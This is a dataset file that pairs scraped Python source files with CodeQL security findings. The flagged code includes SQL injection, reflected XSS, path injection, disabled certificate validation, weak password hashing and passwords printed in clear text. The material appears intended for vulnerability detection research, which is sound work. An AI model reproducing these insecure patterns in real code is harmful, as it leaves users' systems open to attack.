2024-11-18T19:19:09.058478+00:00 | 1,692,885,211,000 | 77e9c6063ad8af33bb121fb06981a55f55d94eb5 | 2 | {
"blob_id": "77e9c6063ad8af33bb121fb06981a55f55d94eb5",
"branch_name": "refs/heads/master",
"committer_date": 1692885211000,
"content_id": "9f020f90cfb435c6ea0215cc628f6514b43077d0",
"detected_licenses": [
"MIT"
],
"directory_id": "b43e0384ec4bfacec2571a2bb41ce563267db449",
"extension": "py",
"fi... | 2.328125 | stackv2 | import os
from hashlib import sha256
import requests
from fastapi.responses import JSONResponse
from jesse.services.env import ENV_VALUES
import jesse.helpers as jh
def password_to_token(password: str) -> JSONResponse:
if password != ENV_VALUES['PASSWORD']:
return unauthorized_response()
auth_token =... | 40 | 24.2 | 82 | 14 | 232 | python | [{"finding_id": "codeql_py/weak-sensitive-data-hashing_cf1cc33ce7da4f36_666ecae2", "tool_name": "codeql", "rule_id": "py/weak-sensitive-data-hashing", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "[Sensitive data (password)](1) is used in a hashing algorithm (SHA256) that is in... | 2 | true | [
"CWE-327",
"CWE-327"
] | [
"py/weak-sensitive-data-hashing",
"py/weak-sensitive-data-hashing"
] | [
"HIGH",
"HIGH"
] | [
"MEDIUM",
"MEDIUM"
] | [
"[Sensitive data (password)](1) is used in a hashing algorithm (SHA256) that is insecure for password hashing, since it is not a computationally expensive hash function.",
"[Sensitive data (password)](1) is used in a hashing algorithm (SHA256) that is insecure for password hashing, since it is not a computational... | [
13,
21
] | [
null,
null
] | [
25,
32
] | [
49,
70
] | |
2024-11-18T19:29:33.919847+00:00 | 1,487,016,061,000 | 8a8dc2f20bbbfd281f6ce224dffc5351ca360800 | 2 | {
"blob_id": "8a8dc2f20bbbfd281f6ce224dffc5351ca360800",
"branch_name": "refs/heads/master",
"committer_date": 1487016061000,
"content_id": "c9c8083f8ec8d9859da27e1b094ed39773c84c3b",
"detected_licenses": [
"Apache-2.0"
],
"directory_id": "1eb27ae253cccf624079c1fb1041406ad248ac8b",
"extension": "py"... | 2.359375 | stackv2 | #!/usr/bin/env python3
#
# Copyright 2017 Peter Schmidt
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable la... | 74 | 37.41 | 139 | 15 | 699 | python | [{"finding_id": "codeql_py/request-without-cert-validation_038280b21fc261e8_34f478b2", "tool_name": "codeql", "rule_id": "py/request-without-cert-validation", "finding_type": "problem", "severity": "medium", "confidence": "medium", "message": "This request may run without certificate validation because [it is disabled]... | 2 | true | [
"CWE-295",
"CWE-295"
] | [
"py/request-without-cert-validation",
"py/request-without-cert-validation"
] | [
"MEDIUM",
"MEDIUM"
] | [
"MEDIUM",
"MEDIUM"
] | [
"This request may run without certificate validation because [it is disabled](1).",
"This request may run without certificate validation because [it is disabled](1)."
] | [
54,
58
] | [
null,
null
] | [
5,
9
] | [
140,
140
] | |
2024-11-18T19:44:13.218191+00:00 | 1,614,885,074,000 | 34d3a25e1631847bba9093e13cd7044d07d31345 | 3 | {
"blob_id": "34d3a25e1631847bba9093e13cd7044d07d31345",
"branch_name": "refs/heads/main",
"committer_date": 1614885074000,
"content_id": "5e4f95bb4e495ade81c10295c43ab2dfc2d9171e",
"detected_licenses": [
"MIT"
],
"directory_id": "adea6c5df0c4a5262421e6fa9d10f2e0ffe03977",
"extension": "py",
"file... | 3.03125 | stackv2 | import streamlit as st
import sqlite3
import gensim
from operator import itemgetter
import matplotlib.pyplot as plt
from sklearn.manifold import TSNE
@st.cache(allow_output_mutation=True)
def load_my_model():
with st.spinner('Downloading word2vec model... please hold...'):
model = gensim.models.KeyedVecto... | 72 | 29.58 | 89 | 17 | 533 | python | [{"finding_id": "codeql_py/sql-injection_985b3b3ca180653c_3249df2e", "tool_name": "codeql", "rule_id": "py/sql-injection", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "This SQL query depends on a [user-provided value](1).", "remediation": "", "location": {"file_path": "unknown... | 1 | true | [
"CWE-089"
] | [
"py/sql-injection"
] | [
"HIGH"
] | [
"MEDIUM"
] | [
"This SQL query depends on a [user-provided value](1)."
] | [
25
] | [
null
] | [
19
] | [
85
] | |
2024-11-18T19:44:15.554692+00:00 | 1,691,154,790,000 | 00c1f85a5d502815249e91a0042789fe7702dbfe | 3 | {
"blob_id": "00c1f85a5d502815249e91a0042789fe7702dbfe",
"branch_name": "refs/heads/master",
"committer_date": 1691154790000,
"content_id": "f43c7656ac20edb10070c589be5187da3f110bf9",
"detected_licenses": [
"Apache-2.0"
],
"directory_id": "4491549f0b1bbf5397ae0b56192605a7abcb61b0",
"extension": "py"... | 2.84375 | stackv2 | # import re
from flask import Flask, render_template, request, url_for, redirect, session
from json import dumps
from random import randint, choice
from db.db import seed_db
from db.users import get_user_by_id, get_user, create_user, get_user_by_username, get_all_user
app = Flask(__name__, static_url_path='/static'... | 143 | 29.22 | 127 | 18 | 1,030 | python | [{"finding_id": "codeql_py/reflective-xss_f2ac926e40f15ec5_f38b1fc1", "tool_name": "codeql", "rule_id": "py/reflective-xss", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "Cross-site scripting vulnerability due to a [user-provided value](1).", "remediation": "", "location": {"fi... | 1 | true | [
"CWE-079"
] | [
"py/reflective-xss"
] | [
"HIGH"
] | [
"MEDIUM"
] | [
"Cross-site scripting vulnerability due to a [user-provided value](1)."
] | [
45
] | [
null
] | [
20
] | [
93
] | |
2024-11-18T19:44:16.261057+00:00 | 1,634,525,846,000 | 47f304936682e8e42ca3bc1db59b883565b9e758 | 2 | {
"blob_id": "47f304936682e8e42ca3bc1db59b883565b9e758",
"branch_name": "refs/heads/master",
"committer_date": 1634525846000,
"content_id": "37936818db443066de1da3e334c32d44e4bfe15c",
"detected_licenses": [
"MIT"
],
"directory_id": "f01b2c34cfcd8b9eb263d950ade44c83a11e45de",
"extension": "py",
"fi... | 2.453125 | stackv2 | import hashlib
import requests
import time
_DEFAULT_API_URL = 'https://my.referralcandy.com/api/v1/'
_API_METHODS = {
'get' : ['verify', 'referrals', 'referrer', 'contacts'],
'post': ['purchase', 'referral', 'signup', 'invite']
}
class ReferralCandy:
def __init__(self, access_id, secret_key):
self... | 36 | 34.11 | 88 | 16 | 302 | python | [{"finding_id": "codeql_py/weak-sensitive-data-hashing_a952a237e7a2f609_a62754da", "tool_name": "codeql", "rule_id": "py/weak-sensitive-data-hashing", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "[Sensitive data (secret)](1) is used in a hashing algorithm (MD5) that is insecur... | 1 | true | [
"CWE-327"
] | [
"py/weak-sensitive-data-hashing"
] | [
"HIGH"
] | [
"MEDIUM"
] | [
"[Sensitive data (secret)](1) is used in a hashing algorithm (MD5) that is insecure."
] | [
23
] | [
null
] | [
28
] | [
73
] | |
2024-11-18T19:44:16.665689+00:00 | 1,519,477,992,000 | 274d48879dd228fda962a78c01f01c5a770fc34d | 2 | {
"blob_id": "274d48879dd228fda962a78c01f01c5a770fc34d",
"branch_name": "refs/heads/master",
"committer_date": 1519477992000,
"content_id": "7513f715d941a25dd64aadcd897a5510d398b87c",
"detected_licenses": [
"MIT"
],
"directory_id": "ae05e74f8dafbd7194c6d3647f420876cd466615",
"extension": "py",
"fi... | 2.375 | stackv2 | """JSON API."""
import os
import functools
from flask import Blueprint, jsonify, g, request
from werkzeug.utils import secure_filename
from beancount.core import data
from beancount.core.amount import Amount
from beancount.core.number import D
from beancount.scripts.format import align_beancount
from fava import uti... | 220 | 30.4 | 77 | 17 | 1,490 | python | [{"finding_id": "codeql_py/reflective-xss_bd8f9bfba9fa96b8_8efcd551", "tool_name": "codeql", "rule_id": "py/reflective-xss", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "Cross-site scripting vulnerability due to a [user-provided value](1).", "remediation": "", "location": {"fi... | 5 | true | [
"CWE-079",
"CWE-022",
"CWE-022",
"CWE-022",
"CWE-022"
] | [
"py/reflective-xss",
"py/path-injection",
"py/path-injection",
"py/path-injection",
"py/path-injection"
] | [
"HIGH",
"HIGH",
"HIGH",
"HIGH",
"HIGH"
] | [
"MEDIUM",
"MEDIUM",
"MEDIUM",
"MEDIUM",
"MEDIUM"
] | [
"Cross-site scripting vulnerability due to a [user-provided value](1).",
"This path depends on a [user-provided value](1).\nThis path depends on a [user-provided value](1).",
"This path depends on a [user-provided value](1).",
"This path depends on a [user-provided value](1).",
"This path depends on a [user... | [
148,
137,
140,
141,
143
] | [
null,
null,
null,
null,
null
] | [
12,
23,
27,
21,
17
] | [
58,
31,
36,
30,
25
] | |
2024-11-18T19:44:31.461618+00:00 | 1,541,437,631,000 | db033f0cb7e9bb616fc636131e85e5e647970ffa | 3 | {
"blob_id": "db033f0cb7e9bb616fc636131e85e5e647970ffa",
"branch_name": "refs/heads/master",
"committer_date": 1541437631000,
"content_id": "2ac593b921fdc3facecdd2e62b931683dc2dd0a1",
"detected_licenses": [
"MIT"
],
"directory_id": "7eab9fa9a7f9bbf272e61f19524447678ee74294",
"extension": "py",
"fi... | 2.671875 | stackv2 | from flask import Flask, render_template, request #imports flask and flask CORS (this allows us to make our
from flask_cors import CORS #server)
app = Flask(__name__) #initializes the app
CORS(app) #allows cross-origin sharing (meaning anyone can send requests to the app)
counter = 0 #this makes counter global (we nee... | 59 | 41.36 | 158 | 22 | 660 | python | [{"finding_id": "codeql_py/reflective-xss_8a6ee9410a858a93_6985409a", "tool_name": "codeql", "rule_id": "py/reflective-xss", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "Cross-site scripting vulnerability due to a [user-provided value](1).", "remediation": "", "location": {"fi... | 1 | true | [
"CWE-079"
] | [
"py/reflective-xss"
] | [
"HIGH"
] | [
"MEDIUM"
] | [
"Cross-site scripting vulnerability due to a [user-provided value](1)."
] | [
19
] | [
null
] | [
16
] | [
30
] | |
2024-11-18T19:44:43.833243+00:00 | 1,533,610,948,000 | 7eb2915068389606a3a7715100ce6b891a4bda0c | 3 | {
"blob_id": "7eb2915068389606a3a7715100ce6b891a4bda0c",
"branch_name": "refs/heads/master",
"committer_date": 1533610948000,
"content_id": "a193de5625b9add12d1c59eb60dd8a26514d6d68",
"detected_licenses": [
"Apache-2.0"
],
"directory_id": "c992cfc718f17672097ad890852d312dbeed3cc3",
"extension": "py"... | 2.625 | stackv2 |
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import json
import logging
from jinja2 import Template
def gen_tensorflow_client_string(generated_tensor_data, model_name):
"""
Generate TensorFlow SDK in Golang.
Args:
generated_tensor_data: Exam... | 74 | 25.58 | 134 | 11 | 507 | python | [{"finding_id": "codeql_py/jinja2/autoescape-false_87bbac0295df4fd3_f4e0d911", "tool_name": "codeql", "rule_id": "py/jinja2/autoescape-false", "finding_type": "problem", "severity": "medium", "confidence": "medium", "message": "Using jinja2 templates with autoescape=False can potentially allow XSS attacks.", "remediati... | 1 | true | [
"CWE-079"
] | [
"py/jinja2/autoescape-false"
] | [
"MEDIUM"
] | [
"MEDIUM"
] | [
"Using jinja2 templates with autoescape=False can potentially allow XSS attacks."
] | [
57
] | [
null
] | [
14
] | [
37
] | |
2024-11-18T20:10:10.150121+00:00 | 1,367,715,349,000 | 61713541148808f73ff1809165e9a619c5e78106 | 2 | {
"blob_id": "61713541148808f73ff1809165e9a619c5e78106",
"branch_name": "refs/heads/master",
"committer_date": 1367715349000,
"content_id": "ff2f0542496bc0b5671caa01aff673d7d4742983",
"detected_licenses": [
"BSD-2-Clause-Views"
],
"directory_id": "eb104109f51134815aab5c6a9124dda3c1bab858",
"extensio... | 2.421875 | stackv2 | #!/usr/bin/env python2
# -* coding: utf-8 -*-
import sys, os
from optparse import OptionParser
from paramiko import SSHClient, AutoAddPolicy
if __name__ == "__main__":
src_dir = "hdiff"
USAGE = "{} [options] hostname source_dir dest_dir".format(sys.argv[0])
parser = OptionParser(usage=USAGE)
parser.a... | 47 | 34.64 | 86 | 17 | 428 | python | [{"finding_id": "codeql_py/paramiko-missing-host-key-validation_e19c8f67e1b54b82_e95389e0", "tool_name": "codeql", "rule_id": "py/paramiko-missing-host-key-validation", "finding_type": "problem", "severity": "medium", "confidence": "high", "message": "Setting missing host key policy to AutoAddPolicy may be unsafe.", "r... | 1 | true | [
"CWE-295"
] | [
"py/paramiko-missing-host-key-validation"
] | [
"HIGH"
] | [
"MEDIUM"
] | [
"Setting missing host key policy to AutoAddPolicy may be unsafe."
] | [
33
] | [
null
] | [
9
] | [
60
] | |
2024-11-18T20:23:14.500852+00:00 | 1,635,775,068,000 | 7e6e385edce66bd8aa7c67a75ff680094e855e14 | 3 | {
"blob_id": "7e6e385edce66bd8aa7c67a75ff680094e855e14",
"branch_name": "refs/heads/main",
"committer_date": 1635775068000,
"content_id": "207246d605373d43d97640c7ea9dc859c26e70ca",
"detected_licenses": [
"MIT"
],
"directory_id": "5e9b26168efa4e2f133c669bb13227a8a4f7b55e",
"extension": "py",
"file... | 2.984375 | stackv2 | import requests
def thumbnail(video, quality='sd'):
"""
video:
id - video id
link - video link
quality:
sd - Standard Quality
mq - Medium Quality
hq - High Quality
maxres - Maximum Resolution
"""
qualities = ["sd", "mq", "hq", "maxres"]
if ("youtube.com" i... | 44 | 24.09 | 77 | 13 | 277 | python | [{"finding_id": "codeql_py/incomplete-url-substring-sanitization_6a8ba5139a919ffa_f9f03e69", "tool_name": "codeql", "rule_id": "py/incomplete-url-substring-sanitization", "finding_type": "problem", "severity": "medium", "confidence": "high", "message": "The string [youtube.com](1) may be at an arbitrary position in the... | 1 | true | [
"CWE-020"
] | [
"py/incomplete-url-substring-sanitization"
] | [
"HIGH"
] | [
"MEDIUM"
] | [
"The string [youtube.com](1) may be at an arbitrary position in the sanitized URL."
] | [
16
] | [
null
] | [
9
] | [
31
] | |
2024-11-18T20:23:21.067069+00:00 | 1,627,746,488,000 | 214fc4076a1800188c7cf9457efa917744a8c21a | 2 | {
"blob_id": "214fc4076a1800188c7cf9457efa917744a8c21a",
"branch_name": "refs/heads/master",
"committer_date": 1627746488000,
"content_id": "d60e9bbc41ca67bf0fd9d7b2e8f469c172b1a967",
"detected_licenses": [
"MIT"
],
"directory_id": "e8887cc3a82a3c0e62f4cfbd84628652dbee7b67",
"extension": "py",
"fi... | 2.421875 | stackv2 | from datetime import datetime
from utils import env
from db import get_database
import urllib.parse
from pymongo.collection import Collection
from bson.objectid import ObjectId
import requests
from base64 import b64encode
from typing import Union
from notion_api import NotionAPI
db = get_database()
users = db["users"... | 206 | 35.02 | 114 | 22 | 1,705 | python | [{"finding_id": "codeql_py/clear-text-logging-sensitive-data_0245bd6193584ada_6b913d49", "tool_name": "codeql", "rule_id": "py/clear-text-logging-sensitive-data", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "This expression logs [sensitive data (secret)](1) as clear text.", "r... | 1 | true | [
"CWE-312"
] | [
"py/clear-text-logging-sensitive-data"
] | [
"HIGH"
] | [
"MEDIUM"
] | [
"This expression logs [sensitive data (secret)](1) as clear text."
] | [
66
] | [
null
] | [
15
] | [
28
] | |
2024-11-18T20:23:31.353267+00:00 | 1,629,014,991,000 | 70948e60a7ac79bedf8c9b1c68a4e79e1ff4830a | 2 | {
"blob_id": "70948e60a7ac79bedf8c9b1c68a4e79e1ff4830a",
"branch_name": "refs/heads/main",
"committer_date": 1629014991000,
"content_id": "5828e3ecf59434f256e7ac5c14507e088fd9bdb6",
"detected_licenses": [
"MIT"
],
"directory_id": "56e9190b61e46285ea16aa5042609e3c0a29cf25",
"extension": "py",
"file... | 2.40625 | stackv2 | # Made with python3
# (C) @FayasNoushad
# Copyright permission under MIT License
# All rights reserved by FayasNoushad
# License -> https://github.com/FayasNoushad/URL-Shortner-Bot/blob/main/LICENSE
import os
import aiohttp
from pyrogram import Client, filters
from pyrogram.types import InlineKeyboardButton, InlineKey... | 211 | 30.13 | 120 | 17 | 1,659 | python | [{"finding_id": "codeql_py/incomplete-url-substring-sanitization_748ccefc36e186bb_2ae87c90", "tool_name": "codeql", "rule_id": "py/incomplete-url-substring-sanitization", "finding_type": "problem", "severity": "medium", "confidence": "high", "message": "The string [github.com](1) may be at an arbitrary position in the ... | 2 | true | [
"CWE-020",
"CWE-020"
] | [
"py/incomplete-url-substring-sanitization",
"py/incomplete-url-substring-sanitization"
] | [
"HIGH",
"HIGH"
] | [
"MEDIUM",
"MEDIUM"
] | [
"The string [github.com](1) may be at an arbitrary position in the sanitized URL.",
"The string [github.io](1) may be at an arbitrary position in the sanitized URL."
] | [
107,
107
] | [
null,
null
] | [
8,
32
] | [
28,
51
] | |
2024-11-18T20:23:41.268629+00:00 | 1,535,549,381,000 | 3167c71bf91e204926a399452b738ef764dd9a91 | 3 | {
"blob_id": "3167c71bf91e204926a399452b738ef764dd9a91",
"branch_name": "refs/heads/master",
"committer_date": 1535549381000,
"content_id": "590723b25de3502953022407fe1f633e44498e96",
"detected_licenses": [
"MIT"
],
"directory_id": "c30c754f0853250d1d6c042ea5369be2470b49b2",
"extension": "py",
"fi... | 2.71875 | stackv2 | import requests
import ratelimit
from arcas.tools import Api
from .api_key import api_key
from arcas.tools import APIError
class Ieee(Api):
"""
API argument is 'ieee'.
"""
def __init__(self):
self.standard = 'https://ieeexploreapi.ieee.org/api/v1/search/articles?'
self.key_api = api_... | 99 | 34.84 | 101 | 16 | 743 | python | [{"finding_id": "codeql_py/request-without-cert-validation_bfb9fb964adc144d_4adc5df2", "tool_name": "codeql", "rule_id": "py/request-without-cert-validation", "finding_type": "problem", "severity": "medium", "confidence": "medium", "message": "This request may run without certificate validation because [it is disabled]... | 1 | true | [
"CWE-295"
] | [
"py/request-without-cert-validation"
] | [
"MEDIUM"
] | [
"MEDIUM"
] | [
"This request may run without certificate validation because [it is disabled](1)."
] | [
31
] | [
null
] | [
20
] | [
64
] | |
2024-11-18T20:49:26.114077+00:00 | 1,581,051,029,000 | a660c89f26278eeee3ce15a4ef1c61679f31faee | 3 | {
"blob_id": "a660c89f26278eeee3ce15a4ef1c61679f31faee",
"branch_name": "refs/heads/master",
"committer_date": 1581051029000,
"content_id": "936e2c92ac8329de14733141224b80dc2f316488",
"detected_licenses": [
"MIT"
],
"directory_id": "85305bfc5fa09dba9bdea515099090b018ad988b",
"extension": "py",
"fi... | 2.578125 | stackv2 | import pymongo
import os
from dotenv import load_dotenv
load_dotenv()
DB_USER = os.getenv("MONGO_USER", default="OOPS")
DB_PASSWORD = os.getenv("MONGO_PASSWORD", default="OOPS")
CLUSTER_NAME = os.getenv("MONGO_CLUSTER_NAME", default="OOPS")
connection_uri = f"mongodb+srv://{DB_USER}:{DB_PASSWORD}@{CLUSTER_NAME}-8evf9.... | 31 | 31.03 | 123 | 10 | 249 | python | [{"finding_id": "codeql_py/clear-text-logging-sensitive-data_8c4aaece23da68dc_67ab9117", "tool_name": "codeql", "rule_id": "py/clear-text-logging-sensitive-data", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "This expression logs [sensitive data (password)](1) as clear text.", ... | 1 | true | [
"CWE-312"
] | [
"py/clear-text-logging-sensitive-data"
] | [
"HIGH"
] | [
"MEDIUM"
] | [
"This expression logs [sensitive data (password)](1) as clear text."
] | [
11
] | [
null
] | [
15
] | [
29
] | |
2024-11-18T20:49:27.365868+00:00 | 1,461,190,415,000 | caa263b4f1f53f2dcdba9a9847e6e46751c7f925 | 3 | {
"blob_id": "caa263b4f1f53f2dcdba9a9847e6e46751c7f925",
"branch_name": "refs/heads/master",
"committer_date": 1461190415000,
"content_id": "4c3fd34a97ed6f2866d900b719d1789c19eae61b",
"detected_licenses": [
"MIT"
],
"directory_id": "7ffafa0c90d469602646fd3ff773303caeb48203",
"extension": "py",
"fi... | 2.875 | stackv2 | import os, sys, requests, re, json
_api_key = None
def _get_api_key():
global _api_key
if _api_key is None:
api_key_file = os.path.expanduser('~/.gcloud/myapp.api-key')
if not os.path.isfile(api_key_file):
raise Exception('''
You have to configure credentials before this script ... | 110 | 35.49 | 143 | 17 | 978 | python | [{"finding_id": "codeql_py/bad-tag-filter_543c2a3273138125_90c80690", "tool_name": "codeql", "rule_id": "py/bad-tag-filter", "finding_type": "problem", "severity": "medium", "confidence": "high", "message": "This regular expression does not match script tags where the attribute uses single-quotes.", "remediation": "", ... | 1 | true | [
"CWE-116"
] | [
"py/bad-tag-filter"
] | [
"HIGH"
] | [
"MEDIUM"
] | [
"This regular expression does not match script tags where the attribute uses single-quotes."
] | [
23
] | [
null
] | [
26
] | [
136
] | |
2024-11-18T20:49:33.621843+00:00 | 1,505,828,771,000 | 48b2af098352aa28e508f7fce160ac2d7a6e97ef | 2 | {
"blob_id": "48b2af098352aa28e508f7fce160ac2d7a6e97ef",
"branch_name": "refs/heads/master",
"committer_date": 1505828771000,
"content_id": "bb2adce0236579635049d58bd3bd983a6d0c0163",
"detected_licenses": [
"MIT"
],
"directory_id": "6e6d906c3aeba3c6e03fbd4b94ee7581c66fd877",
"extension": "py",
"fi... | 2.390625 | stackv2 | from flask import Flask, abort, request, make_response, current_app , Response
from pprint import pprint as pp
from json import dumps
from werkzeug.http import HTTP_STATUS_CODES
import re
from flatapi.resource import *
import sys
try:
from urlparse import parse_qsl
except ImportError:
from urllib.parse import... | 173 | 28.45 | 93 | 18 | 1,217 | python | [{"finding_id": "codeql_py/stack-trace-exposure_a9b4b1dd8db3a3b3_cd257bd9", "tool_name": "codeql", "rule_id": "py/stack-trace-exposure", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "[Stack trace information](1) flows to this location and may be exposed to an external user.\n[S... | 1 | true | [
"CWE-209"
] | [
"py/stack-trace-exposure"
] | [
"HIGH"
] | [
"MEDIUM"
] | [
"[Stack trace information](1) flows to this location and may be exposed to an external user.\n[Stack trace information](2) flows to this location and may be exposed to an external user.\n[Stack trace information](3) flows to this location and may be exposed to an external user.\n[Stack trace information](4) flows t... | [
74
] | [
null
] | [
26
] | [
32
] | |
2024-11-18T20:49:57.585756+00:00 | 1,415,987,631,000 | 9a5490c6a878aabb3833d1dc4040f68c7eacf5d7 | 3 | {
"blob_id": "9a5490c6a878aabb3833d1dc4040f68c7eacf5d7",
"branch_name": "refs/heads/master",
"committer_date": 1415987631000,
"content_id": "5941945c3403881265e395fdeb8ac61ae7dff853",
"detected_licenses": [
"BSD-2-Clause"
],
"directory_id": "a35f869396afdad093da5e68dfacc3ddbe8bef85",
"extension": "p... | 2.9375 | stackv2 | # -*- coding: utf-8 -*-
import argparse
import os
from collections import namedtuple
from jinja2 import Environment, FileSystemLoader
from codecs import open
import re
Item = namedtuple('Item', ('src', 'title', 'author', 'slug'))
def render_template(template, **kwargs):
env = Environment(loader=FileSystemLoader(... | 53 | 30.6 | 69 | 16 | 385 | python | [{"finding_id": "codeql_py/jinja2/autoescape-false_456a3ff22f5e0041_925df0e9", "tool_name": "codeql", "rule_id": "py/jinja2/autoescape-false", "finding_type": "problem", "severity": "medium", "confidence": "medium", "message": "Using jinja2 templates with autoescape=False can potentially allow XSS attacks.", "remediati... | 1 | true | [
"CWE-079"
] | [
"py/jinja2/autoescape-false"
] | [
"MEDIUM"
] | [
"MEDIUM"
] | [
"Using jinja2 templates with autoescape=False can potentially allow XSS attacks."
] | [
13
] | [
null
] | [
11
] | [
52
] | |
2024-11-18T20:50:36.789866+00:00 | 1,676,139,610,000 | 7a587091306cff16f54de8e62c0d8c714da63d0a | 3 | {
"blob_id": "7a587091306cff16f54de8e62c0d8c714da63d0a",
"branch_name": "refs/heads/master",
"committer_date": 1676139610000,
"content_id": "07423c79877c031b0cdeb9cd94d71105744dce59",
"detected_licenses": [
"MIT"
],
"directory_id": "255e19ddc1bcde0d3d4fe70e01cec9bb724979c9",
"extension": "py",
"fi... | 2.9375 | stackv2 | #!/usr/bin/python2.7
import sys
def gftp_descrable_password(password):
"""gftp password descrambler
This code has been released in the Public Domain by the original author.
"""
if not password.startswith('$'):
return password
newpassword = []
pwdparts = map(ord, password)
for i i... | 28 | 26.5 | 77 | 18 | 220 | python | [{"finding_id": "codeql_py/clear-text-logging-sensitive-data_7b18a5ef22721f6e_561ed853", "tool_name": "codeql", "rule_id": "py/clear-text-logging-sensitive-data", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "This expression logs [sensitive data (password)](1) as clear text.\nT... | 1 | true | [
"CWE-312"
] | [
"py/clear-text-logging-sensitive-data"
] | [
"HIGH"
] | [
"MEDIUM"
] | [
"This expression logs [sensitive data (password)](1) as clear text.\nThis expression logs [sensitive data (password)](2) as clear text.\nThis expression logs [sensitive data (password)](3) as clear text."
] | [
25
] | [
null
] | [
22
] | [
77
] | |
2024-11-18T20:50:45.982713+00:00 | 1,520,513,776,000 | 1f1dccace04f1551446937c1ac29de2d42cfa793 | 3 | {
"blob_id": "1f1dccace04f1551446937c1ac29de2d42cfa793",
"branch_name": "refs/heads/master",
"committer_date": 1520513776000,
"content_id": "45c4e630f2feadd57e0348cf9ff1bbab7b78cb34",
"detected_licenses": [
"MIT"
],
"directory_id": "07ce39672a88b01d91b8e9138699e82ee530f159",
"extension": "py",
"fi... | 3.3125 | stackv2 | from string import digits, ascii_letters
from time import time
def get_next_password(local, cur):
ind = len(cur) - 1
last_letter = cur[ind]
if cur[ind] != local[len(local) - 1]:
last_letter = local[local.index(last_letter) + 1]
return cur[0:ind] + last_letter
else:
for i in range(ind - 1, -1, -1):
if cur[... | 39 | 25.33 | 78 | 20 | 306 | python | [{"finding_id": "codeql_py/clear-text-logging-sensitive-data_1f5cc9cec80b4124_61633111", "tool_name": "codeql", "rule_id": "py/clear-text-logging-sensitive-data", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "This expression logs [sensitive data (password)](1) as clear text.\nT... | 1 | true | [
"CWE-312"
] | [
"py/clear-text-logging-sensitive-data"
] | [
"HIGH"
] | [
"MEDIUM"
] | [
"This expression logs [sensitive data (password)](1) as clear text.\nThis expression logs [sensitive data (password)](2) as clear text."
] | [
33
] | [
null
] | [
10
] | [
78
] | |
2024-11-18T20:50:53.715772+00:00 | 1,604,653,091,000 | 3f45767bf28ac1108473bfcc13f72d900f952498 | 3 | {
"blob_id": "3f45767bf28ac1108473bfcc13f72d900f952498",
"branch_name": "refs/heads/master",
"committer_date": 1604653091000,
"content_id": "da3f0644a7e6545157a3971a7eab532b55a7660f",
"detected_licenses": [
"MIT"
],
"directory_id": "34ba661c593167e2aaa4da6cda5a638524ea8823",
"extension": "py",
"fi... | 2.96875 | stackv2 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Sample script to get System ID LED status via iRMC Redfish API
in Fujitsu PRIMERGY
"""
import sys
import argparse
import requests
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
__author__ = "Masahiro Murayama"
__version__ = "0.0... | 55 | 24.69 | 79 | 15 | 369 | python | [{"finding_id": "codeql_py/request-without-cert-validation_d02df60858abd7bd_1164bb72", "tool_name": "codeql", "rule_id": "py/request-without-cert-validation", "finding_type": "problem", "severity": "medium", "confidence": "medium", "message": "This request may run without certificate validation because [it is disabled]... | 1 | true | [
"CWE-295"
] | [
"py/request-without-cert-validation"
] | [
"MEDIUM"
] | [
"MEDIUM"
] | [
"This request may run without certificate validation because [it is disabled](1)."
] | [
21
] | [
null
] | [
16
] | [
70
] | |
2024-11-18T20:50:55.764625+00:00 | 1,591,063,393,000 | 478ce44f5ebb8882efdf656d0b8a598fd6cdfb2b | 3 | {
"blob_id": "478ce44f5ebb8882efdf656d0b8a598fd6cdfb2b",
"branch_name": "refs/heads/master",
"committer_date": 1591063393000,
"content_id": "904df374ec2961805a29c9d1e859538bfceffc9d",
"detected_licenses": [
"MIT"
],
"directory_id": "c24cdd5d7cd7982b307152268c430082b1a8ae70",
"extension": "py",
"fi... | 2.703125 | stackv2 | from aiohttp import web
from functools import wraps
from threading import Thread
from multidict import MultiDict
import sys
import json
class AbstractHandler:
routes = web.RouteTableDef()
cors_header = MultiDict({'Access-Control-Allow-Origin': 'http://localhost:8080'})
def __init__(self):
pass
... | 55 | 31.55 | 100 | 20 | 366 | python | [{"finding_id": "codeql_py/stack-trace-exposure_5942b70250186e1f_df6eabe6", "tool_name": "codeql", "rule_id": "py/stack-trace-exposure", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "[Stack trace information](1) flows to this location and may be exposed to an external user.", "... | 1 | true | [
"CWE-209"
] | [
"py/stack-trace-exposure"
] | [
"HIGH"
] | [
"MEDIUM"
] | [
"[Stack trace information](1) flows to this location and may be exposed to an external user."
] | [
30
] | [
null
] | [
54
] | [
60
] | |
2024-11-18T20:51:27.706131+00:00 | 1,526,045,269,000 | c91c895b208e5d4db7200dbdceaaa407cfd8e181 | 3 | {
"blob_id": "c91c895b208e5d4db7200dbdceaaa407cfd8e181",
"branch_name": "refs/heads/master",
"committer_date": 1526045269000,
"content_id": "0397953b9ca27dc8f089623587dab7ff39dc26b4",
"detected_licenses": [
"MIT"
],
"directory_id": "4cb5bc85920617f0c99a0f417ab8cc8ca974dda6",
"extension": "py",
"fi... | 2.671875 | stackv2 | import json
import subprocess
def create_accounts(domain, username, password):
cmd = "ejabberdctl register {} {} {}".format(username, domain, password)
print(cmd)
subprocess.call(cmd)
def forge_relations(user1,user2,domain):
cmd1 = "ejabberdctl add-rosteritem {} {} {} {} {}-{} groupvpn both"\
